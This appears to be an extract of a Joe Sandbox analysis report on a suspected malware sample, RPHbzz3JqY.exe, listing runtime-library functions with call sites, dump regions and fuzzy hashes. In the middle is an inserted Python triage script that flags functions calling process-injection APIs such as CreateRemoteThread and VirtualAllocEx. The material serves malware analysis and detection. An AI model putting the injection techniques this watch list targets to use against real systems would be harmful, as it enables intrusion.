                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0060097D: HeapAlloc.KERNEL32(00000000,?,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 006009AF
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD3D
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD54
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD71
                                                                                                                                                                                            • _free.LIBCMT ref: 005FAD8C
                                                                                                                                                                                            • _free.LIBCMT ref: 005FADA3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                            • String ID: \2a$x2a
                                                                                                                                                                                            • API String ID: 1835388192-915316952
                                                                                                                                                                                            • Opcode ID: a258a402f05fe14e179f8f76b7b8196d86ebe745330d9e8eecc9aa34fd8080ec
                                                                                                                                                                                            • Instruction ID: f65ca1ff85ac71ae7d6b7863874d450cedfc9c483de40633606fd1c6ed7c3316
                                                                                                                                                                                            • Opcode Fuzzy Hash: a258a402f05fe14e179f8f76b7b8196d86ebe745330d9e8eecc9aa34fd8080ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451B371A003099FDB219F69D841ABA7BF9FF48711F144569EA0ADB250E739EE008B42
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1A62
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D1A7D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1A9D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1AEE
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 005D1B50
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005D1B68
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
• String ID: d`
• API String ID: 1858714459-4132929406
• Opcode ID: 63881efeba4f8ed52c7b58b72b3e6f151f68e2b0d9f3c1c46ccde9e88a79c6c4
• Instruction ID: 1f2112163e922dba496ac31a76425976a397e6d3a76bcd748f5d709ecb666b44
• Opcode Fuzzy Hash: 63881efeba4f8ed52c7b58b72b3e6f151f68e2b0d9f3c1c46ccde9e88a79c6c4
• Instruction Fuzzy Hash: 7F31F631A01615AFD734DF5CD884999BBA1FF50350B2481ABD8899B312EB31EE42CBC4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: _free$___from_strstr_to_strchr
• String ID:
• API String ID: 3409252457-0
• Opcode ID: a30ce604f6dd5be4373aeb08a6c7f3a9c63af5ee412410669a7ca487bfb8918c
• Instruction ID: 5e2ae3d30ebaa0d554564a2e3e18454af1429a55583183d2bd2b0a341555b236
• Opcode Fuzzy Hash: a30ce604f6dd5be4373aeb08a6c7f3a9c63af5ee412410669a7ca487bfb8918c
• Instruction Fuzzy Hash: 025129B0984B49AFDB29AF648C45ABF7FABEF01310F00456DE652972C2EB758941CF50
APIs
Strings
Similarity
• API ID: __fread_nolock
• String ID: ,`$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2638373210-833346958
• Opcode ID: 05610ee7647f9865b99e4c2b42a61571c0344147d0ea90418006fa2aff11fe3b
• Instruction ID: 09be4c00884360730d23eae60ba908ceef4ad5fab254e4902ae0da6e0ca6c700
• Opcode Fuzzy Hash: 05610ee7647f9865b99e4c2b42a61571c0344147d0ea90418006fa2aff11fe3b
• Instruction Fuzzy Hash: 7CA18B36A001099FCB28CF6CC884AAEBBA6FF94320F14856BED19CB355D631DD50CB90
Strings
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\RPHbzz3JqY.exe$}L`
• API String ID: 0-3499546593
• Opcode ID: 4638b63f38ddad28bdb6b78d7fc6df5e1610734cfbf0f7a1f12e4438dc65efd3
• Instruction ID: 95762fa2229ae26902c4911c61637f8cb91ae70cf12ab629c176f6c7136f3416
• Opcode Fuzzy Hash: 4638b63f38ddad28bdb6b78d7fc6df5e1610734cfbf0f7a1f12e4438dc65efd3
• Instruction Fuzzy Hash: FF21B0B164810A6FDB34AF618C84EBB7BAEEE803687104514FA15962D1EF64EC1187A0
Strings
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 4ecd05929889a804de0a8bcd181cf55fe913f693ad464623a5077b6c2c87e51f
• Instruction ID: ce7b2149284a1a36f7e1832274e878d980ba8ab7f36e577d142845ef00672c16
• Opcode Fuzzy Hash: 4ecd05929889a804de0a8bcd181cf55fe913f693ad464623a5077b6c2c87e51f
• Instruction Fuzzy Hash: BD21C632A41229A7CB214B248D45F7B7FBBBB057A0F150914FE16A7290DB39DD00C6F0
APIs
  • Part of subcall function 006063FF: _free.LIBCMT ref: 00606424
• _free.LIBCMT ref: 00606701
  • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
  • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
• _free.LIBCMT ref: 0060670C
• _free.LIBCMT ref: 00606717
• _free.LIBCMT ref: 0060676B
• _free.LIBCMT ref: 00606776
• _free.LIBCMT ref: 00606781
• _free.LIBCMT ref: 0060678C
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
• Instruction ID: 9a852376d423f5eb5c7e76c4cf54eb43446b57db431a26cd9cc29827ae289bcb
• Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
• Instruction Fuzzy Hash: F21181315C0B08BBD569B7B0CD0BFDB7F9DAF40740F40083CB79966092DA39B5254694
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005F6637,?,?,005F65FF,00000001,00000000,?), ref: 005F6657
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F666A
• FreeLibrary.KERNEL32(00000000,?,?,005F6637,?,?,005F65FF,00000001,00000000,?), ref: 005F668D
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: @0]$CorExitProcess$mscoree.dll
• API String ID: 4061214504-173498003
• Opcode ID: b651c5fdd4f45f76d5a0856b41a0be311759b5308fbfd2c19e686adf0f21b547
• Instruction ID: 8b28d546126019d1d7109170c074b576dd171d2cd4d3f7886b412c70b9afa398
• Opcode Fuzzy Hash: b651c5fdd4f45f76d5a0856b41a0be311759b5308fbfd2c19e686adf0f21b547
• Instruction Fuzzy Hash: FEF05830A4022CBBDB119BA0DC09BAEBEAAEF00756F050460AA01E61A0CB758E00DA94
APIs
• GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 005FDE9E
• __fassign.LIBCMT ref: 005FE083
• __fassign.LIBCMT ref: 005FE0A0
• WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005FE0E8
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005FE128
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 005FE1D0
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1735259414-0
                                                                                                                                                                                            • Opcode ID: 9aa2734bd5e5ef99c2637931f18c4001985f497adbebedbee1d45cae952c71c5
                                                                                                                                                                                            • Instruction ID: ab9e0bddbc0f9e1b5954e69baceee0e01a229faf821e6e9fd9f7cfd95e7d9304
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aa2734bd5e5ef99c2637931f18c4001985f497adbebedbee1d45cae952c71c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EC1AD71D0025D9FDB24CFA9C8809EDBFB6BF48304F28416AE956B7352D6359D06CB60
APIs
• GetCPInfo.KERNEL32(?,?), ref: 005F05A7
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005F0635
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005F06A7
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005F06C1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005F0724
• CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 005F0741
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ByteCharMultiWide$CompareInfoString
• String ID:
• API String ID: 2984826149-0
• Opcode ID: 09f2558c92068c3b75b797065ed3b1192420b6af17e3945ae90ee397b461ae45
• Instruction ID: c09a215e81bd580fd0181869f93db2d96d42eff4bc3cba844e2412a47fb4bcff
• Opcode Fuzzy Hash: 09f2558c92068c3b75b797065ed3b1192420b6af17e3945ae90ee397b461ae45
• Instruction Fuzzy Hash: 83718D7190120EAADF219FA4CC49AFE7FB6FF85350F1C2455EA05E6192DB799840CBA0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005F032B
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005F0396
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F03B3
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005F03F2
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F0451
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005F0474
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
• Opcode ID: c22bc67121f7773a66855a25d989e7295d3064570b1faf5069c440d90c1e5b95
• Instruction ID: fb3dedde16d7b7fc1cb9c3bddd8d6ff2e823c51b7ff93644e149eeb1c5c03214
• Opcode Fuzzy Hash: c22bc67121f7773a66855a25d989e7295d3064570b1faf5069c440d90c1e5b95
• Instruction Fuzzy Hash: 9C518D7250021EABEF209F64CC49FBB7FAAFB44750F189925BB05961D2D7798C108BA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: _strrchr
• String ID: $i_
• API String ID: 3213747228-2414783397
• Opcode ID: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
• Instruction ID: 4b08b76d5def55339a86dcec00c0b26b49fe4c7bb8d757bc30dd79b2a1f399d4
• Opcode Fuzzy Hash: baa62c8111508225817319dd1be884d816bd16b82f7b4bf7868aea9b7a7ecd7c
• Instruction Fuzzy Hash: 43B149719402869FEB298F24C8417FFBBF6EF56300F1441AAE945AF381D6349D41C760
APIs
• GetLastError.KERNEL32(?,?,005F3951,005F27FB,005F15E7), ref: 005F3968
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F3976
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F398F
• SetLastError.KERNEL32(00000000,005F3951,005F27FB,005F15E7), ref: 005F39E1
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 300e414b6d0f42656769e0e713988273b85ebeeb90939450eed1f8caef365ee3
• Instruction ID: 3e9f63e15d2ab1747510464908273a015cec1f6a3c24788a93b5445374bede0e
• Opcode Fuzzy Hash: 300e414b6d0f42656769e0e713988273b85ebeeb90939450eed1f8caef365ee3
• Instruction Fuzzy Hash: 2901B53220A21A5EBB246B756C9AA7B2E46FB45776724123AF318412E2FED94D015540
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: AdjustPointer
• String ID: @0]
• API String ID: 1740715915-1162301288
• Opcode ID: bde7764eac2eeda61790ee326846fb8895d4863e670b0ddaef82273b3f8f4562
• Instruction ID: b26a858e6e6362c206225e245346c15c130fb7f7c1a2ba5878244c219448e411
• Opcode Fuzzy Hash: bde7764eac2eeda61790ee326846fb8895d4863e670b0ddaef82273b3f8f4562
• Instruction Fuzzy Hash: 6651CF7160160EAFEB249F10C855B7A7FA5FF40710F24482DEE4587291E739AE41D790
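Every function record in this listing follows one fixed layout: an "APIs" list of call sites, a "Memory Dump Source" line giving the dump region and module base, and "Similarity" fields (API ID, String ID, fuzzy hashes). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout from a constructed sample shaped like these records and flags functions that call any watch-listed API, which is the first thing an analyst wants when the listing runs to thousands of records. Assumptions: the sample input is constructed, not copied from the report; the 4th dot-separated field of the dump name is read as the region base (it agrees with the Offset values seen above) and the 5th as the page protection, which is an assumption about the dump-name format, not something this page documents.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Sequence, Tuple

# Constructed sample shaped like the report's function listing (two records).
# The values are illustrative and are not copied from the report.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,005F3951,005F27FB,005F15E7), ref: 005F3968
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F3976
• SetLastError.KERNEL32(00000000,005F3951,005F27FB,005F15E7), ref: 005F39E1
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Instruction Fuzzy Hash: 2901B53220A21A5EBB246B756C9AA7B2E46FB45776724123AF318412E2FED94D015540
APIs
• FreeLibrary.KERNEL32(00000000,?,InitializeCriticalSectionEx,00611958,mscoree.dll,00000000), ref: 005F4A82
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005FE128
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no argument list)
API_RE = re.compile(
    r"^•\s*(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Only the "Source File" line carries Offset and "based on PE"; "Associated" lines do not.
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<dump>[0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                              # call-site address given after "ref:"


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    region_base: Optional[int] = None     # 4th dot-field of the dump name
    protection: Optional[int] = None      # 5th dot-field; ASSUMED to be the page protection
    module_base: Optional[int] = None     # "Offset:" value
    based_on_pe: bool = False
    similarity: Dict[str, str] = field(default_factory=dict)


def parse_listing(text: str) -> List[FunctionRecord]:
    """Split the listing into records; every 'APIs' header starts a new one."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    section = ""
    for raw in text.splitlines():
        line = raw.strip()                # the exported page indents every line heavily
        if not line:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
            continue
        if line in SECTIONS:
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.search(line)
            if m and cur.region_base is None:
                parts = m.group("dump").split(".")
                cur.region_base = int(parts[3], 16)
                cur.protection = int(parts[4], 16)
                cur.module_base = int(m.group("offset"), 16)
                cur.based_on_pe = m.group("pe") == "true"
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                cur.similarity[m.group("key").strip()] = m.group("val").strip()
    return records


def api_names(rec: FunctionRecord) -> List[str]:
    return [a.name for a in rec.apis]


def triage(records: Sequence[FunctionRecord], watchlist: Sequence[str]) -> List[Tuple[int, List[str]]]:
    """Indices of records that call any watch-listed API, with the matched names."""
    wanted = set(watchlist)
    hits: List[Tuple[int, List[str]]] = []
    for i, rec in enumerate(records):
        matched = sorted({a.name for a in rec.apis} & wanted)
        if matched:
            hits.append((i, matched))
    return hits


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for i, rec in enumerate(recs):
        print(i, hex(rec.region_base or 0), rec.similarity.get("API ID"), api_names(rec))
    print(triage(recs, ["WriteFile", "CreateRemoteThread", "VirtualAllocEx"]))
```

Feed it the whole exported function listing rather than the sample and the watch list does the cut: records whose only calls are locale, TLS or api-set probing helpers can be set aside, and the remaining hits are the ones worth opening in the dump at their "ref:" addresses.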
APIs
• FreeLibrary.KERNEL32(00000000,?,?,?,005F4AB3,?,?,00620B4C,00000000,?,005F4BDE,00000004,InitializeCriticalSectionEx,00611958,mscoree.dll,00000000), ref: 005F4A82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 9b988abd6b198defed7e0f51b1bb3adf4d89ea6e080ec04bd5656329fc3649c1
• Instruction ID: 4a245f1adb8b4f38342fa4a56a7895d95ed94d9656c075199f02655550cd9585
• Opcode Fuzzy Hash: 9b988abd6b198defed7e0f51b1bb3adf4d89ea6e080ec04bd5656329fc3649c1
                                                                                                                                                                                            • Instruction Fuzzy Hash: A111CA32AC1239ABDB318B689C4476B3B9ABF41770F150951FA51EB280D774ED008ED9
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 006061A0
                                                                                                                                                                                              • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
                                                                                                                                                                                              • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 006061B2
                                                                                                                                                                                            • _free.LIBCMT ref: 006061C4
                                                                                                                                                                                            • _free.LIBCMT ref: 006061D6
                                                                                                                                                                                            • _free.LIBCMT ref: 006061E8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 04e09cffdc8fc455571419066f49bf780ff7b56eaced4f244914e42ba9c71b57
                                                                                                                                                                                            • Instruction ID: 44bda84abd51fc8cd5c880ba0c3fd2c292473a637d17c27ca69671b3ad178b53
                                                                                                                                                                                            • Opcode Fuzzy Hash: 04e09cffdc8fc455571419066f49bf780ff7b56eaced4f244914e42ba9c71b57
                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F01232584248BBC625EB58FA86C9B7FEFBA407207585866F619D7642CB34FCA08650
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005D1D46
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 8e615ca537233f60dec03f20f56955f6796ef1ac6db502d44e0d831a5412c922
                                                                                                                                                                                            • Instruction ID: 4c11eab08e431ef7d1b95c1ce5a274ca44afaa0c2996069e55c13a603971a402
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e615ca537233f60dec03f20f56955f6796ef1ac6db502d44e0d831a5412c922
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B616BB1A00615DFDB14CF18C885B9ABBF5FF48300F1484AAED459B386D776E901CB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 005D254F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-1866435925
                                                                                                                                                                                            • Opcode ID: e158e7cf22e74cec819319abcec0173db0779319f0c80bf8000b48deca5a0bc9
                                                                                                                                                                                            • Instruction ID: eaa9b60f691ed6d9694b119d2e1992f9b09bed3bdf05e26709bf1ee3470f8b68
